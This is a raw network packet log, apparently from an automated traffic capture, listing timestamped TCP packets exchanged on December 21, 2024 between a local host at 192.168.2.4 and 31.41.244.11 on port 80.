                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.823633909 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.823676109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.823765039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.824512005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.824558973 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.824650049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.824695110 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.825529099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.825586081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.825656891 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.825794935 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.826528072 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.826571941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.826646090 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.826685905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.827528000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.827568054 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.827657938 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.827694893 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.828531981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.828654051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.828686953 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.828733921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.829546928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.829600096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.829648018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.829684973 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.830703020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.830740929 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.830755949 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.830794096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.831599951 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.831639051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.831707954 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.831768036 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.832577944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.832618952 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.832726955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.832767963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.833597898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.833714008 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.833728075 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.833810091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.834568024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.834610939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.834702015 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.834739923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.835597038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.835658073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.835730076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.835788965 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.836595058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.836641073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.836741924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.836783886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.837771893 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.837884903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.837970018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.838009119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.839255095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.839302063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.839440107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.839489937 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840111017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840235949 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840287924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840939999 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840990067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.840997934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.841036081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.841945887 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.842006922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.842190027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.842240095 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.842941999 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843003988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843034029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843204975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843815088 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843873978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843878031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.843919039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.844665051 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.844738007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.844786882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.844835997 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.845664024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.845724106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.845772028 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.845895052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.846659899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.846702099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.846796989 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.846841097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.847654104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.847721100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.847791910 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.847841024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.848656893 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.848697901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.848798990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.848844051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.849669933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.849713087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.849793911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.849839926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.850677967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.850744963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.850788116 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.850831985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.851692915 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.851733923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.851835966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.851903915 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.852693081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.852735996 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.852807045 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.852863073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.853696108 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.853739977 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.853812933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.853852034 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.854696035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.854743004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.854815006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.854854107 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.855734110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.855792046 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.855845928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.856378078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.856782913 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.856822968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.856995106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.857043982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.857743025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.857781887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.857852936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.857899904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.858728886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.858788013 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.858867884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.858913898 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.859724998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.859770060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.859844923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.859894991 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.860752106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.860800982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.860889912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.860934019 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.861752987 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.861797094 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.862021923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.862070084 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.862704039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.862795115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002233982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002286911 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002623081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002667904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002708912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002847910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002892017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.002948999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.003691912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.003734112 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.003854990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.003895998 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.004690886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.004803896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.004843950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.004885912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.005649090 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.005692005 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.005799055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.006061077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.006679058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.006752968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.006809950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.006872892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.007664919 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.007707119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.007811069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.007854939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.008680105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.008852005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.008893967 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.009677887 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.009720087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.009840012 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.009880066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.010701895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.010751009 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.010864973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.010906935 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.011729002 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.011769056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.011878014 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.011919022 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.012738943 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.012785912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.012847900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.012907982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.013736010 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.013777971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.013887882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.013952971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.014722109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.014784098 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.014868021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.015003920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.015749931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.015839100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.015883923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.015925884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.016783953 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.016902924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.016947985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.017762899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.017810106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.017916918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.017956018 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.018789053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.018832922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.018968105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.019011021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.019745111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.019787073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.019886971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.019933939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.020838976 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.020891905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.020986080 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.021155119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.021809101 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.021856070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.021986961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.022033930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.022784948 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.022830963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.022918940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.023019075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.023756027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.023804903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.023932934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.023972988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.024882078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.024981976 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.024998903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.025018930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.025789976 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.025888920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.025921106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.025960922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.026782036 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.026822090 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.026946068 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.026984930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.027791977 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.027831078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.027952909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.028000116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.028857946 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.028903961 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.028990030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.029030085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.029817104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.029855013 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.029962063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.030095100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.030914068 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.031009912 CET804979731.41.244.11192.168.2.4
